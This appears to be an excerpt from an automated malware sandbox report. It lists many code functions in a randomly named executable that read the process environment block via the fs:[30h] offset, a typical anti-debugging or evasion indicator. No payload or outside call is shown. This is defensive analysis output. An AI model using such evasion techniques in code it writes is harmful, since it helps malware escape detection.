        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA830 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B64015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B64015 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B17016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B17016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B17016 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A96800 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A96800 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A96800 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B61074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B52073 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABF86D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51843 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB0050 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC61A0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B151BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B151BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B151BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B151BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B549A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B549A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B549A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B549A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB99BF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B169A6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACA185 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABC182 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9519E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9519E mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2990 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5A189 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5A189 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9B1E1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A931E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B689E7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B241E8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B519D8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB4120 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB4120 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A93138 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC513A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99100 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9C962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68966 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5E962 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9B171 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51951 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB944 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9395E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9395E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A91AA0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A952A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC5AA0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC5AA0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC12BD mov esi, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC12BD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC12BD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AAAAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACFAB0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5129A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACD294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACD294 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2AE4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B54AEF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A93ACA mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2ACB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95AC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95AC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95AC0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68ADD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A912D4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD4A2C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABA229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94A20 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A94A20 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A98239 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A98239 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A98239 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51229 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABB236 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA8A0A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AB3A1C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95210 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A95210 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A9AA16 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD5A69 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD5A69 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD5A69 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4B260 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68A62 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AD927A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B5EA55 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B24257 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00A99240 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51A5F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B68BB6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC4BAD mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B69BBE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B65BA5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B51BA8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AA1B8F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC138B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABEB9A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ABEB9A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B4D380 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00B3EB8A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00AC2397 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Citvonvhciktufwvyzyhistnewdjgsoqdr.exeCode function: 3_2_00ACB390 mov eax, dword ptr fs:[00000030h]
